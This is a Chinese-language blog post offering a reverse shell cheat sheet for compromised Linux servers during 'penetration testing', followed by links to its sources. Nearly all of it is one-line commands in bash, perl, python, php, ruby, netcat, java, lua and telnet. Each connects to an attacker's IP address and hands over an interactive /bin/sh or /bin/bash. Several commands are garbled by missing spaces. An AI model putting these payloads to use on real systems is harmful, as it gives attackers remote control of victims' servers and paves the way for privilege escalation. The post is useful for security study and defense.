大家在做***测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,今天再告诉大家几种方法,国外大牛和国内大牛整理的,希望大家喜欢。

bash

bash版本:

1bash-i >& /dev/tcp/10.0.0.1/80800>&1

注意这个是由解析shell的bash完成,所以某些情况下不支持

perl版本:

1perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python版本:

1python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php版本:

1php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby版本:

1ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc版本:

1nc -e /bin/sh10.0.0.1 1234
2rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i 2>&1|nc 10.0.0.1 1234 >/tmp/f
3nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

java版本

1r = Runtime.getRuntime()
2p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
3p.waitFor()

lua版本:

1lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

nc不使用-e:

01Hacker:nc -lvnp listenport
02Victim:mknod/tmp/backpipep
03Victim:/bin/sh0</tmp/backpipe| nc attackerip listenport 1>/tmp/backpipe
04不使用nc
05Method 1:
06Hacker: nc -nvlpp 8080
07Victim: /bin/bash-i > /dev/tcp/173.214.173.151/80800<&1 2>&1
08Method 2:
09Hacker: nc -nvlpp8080
10Victim: mknodbackpipe p && telnet 173.214.173.151 8080 0backpipe
11Method 3:
12Hacker: nc -nvlpp8080
13Hacker: nc -nvlpp8888
14Victim: telnet 173.214.173.151 8080 | /bin/bash| telnet 173.214.173.151 8888

参考文章:

http://zone.wooyun.org/content/5064

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet